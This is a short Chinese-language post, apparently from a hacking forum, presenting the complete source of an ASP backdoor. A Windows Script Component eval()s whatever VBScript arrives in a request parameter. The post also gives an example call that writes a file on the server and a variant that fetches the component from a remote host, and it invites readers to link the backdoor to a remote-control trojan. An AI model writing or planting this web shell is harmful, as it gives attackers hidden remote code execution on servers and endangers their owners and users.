利用wsc制作的一個(gè)asp后門(mén)

    ScriptCodingInfo.wsc代碼如下，該文件可以改成任意后綴
    <?xml version="1.0" encoding="gb2312" standalone="yes"?>
    <?component error="true" debug="true"?>
    <package>
    <component id="haiyangtop">
    <public>
    <method name="lcx"><parameter name="b"/></method>
    </public>
    <script language="VBScript"><![CDATA[
    sub lcx(b)
    eval(b)
    end sub
    ]]>
    </script>
    </component>
    </package>
    backdoor.asp內(nèi)容如下：
    <%
    b=request("a")
    Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop")
    fs.lcx(b)
    %>
    調(diào)用方法如下：http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
    注意這里的a=只能是vbs的代碼，不可以接受像response、rquest之類(lèi)的asp的東東。
    如果是2000服務(wù)器可以在backdoor.asp遠(yuǎn)程調(diào)用ScriptCodingInfo.wsc，像
    Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")，2003服務(wù)器中不可以。
    算一個(gè)思路，雞肋，誰(shuí)有更好的辦法完善，能夠直接調(diào)用cs的asp木馬的c端就好了。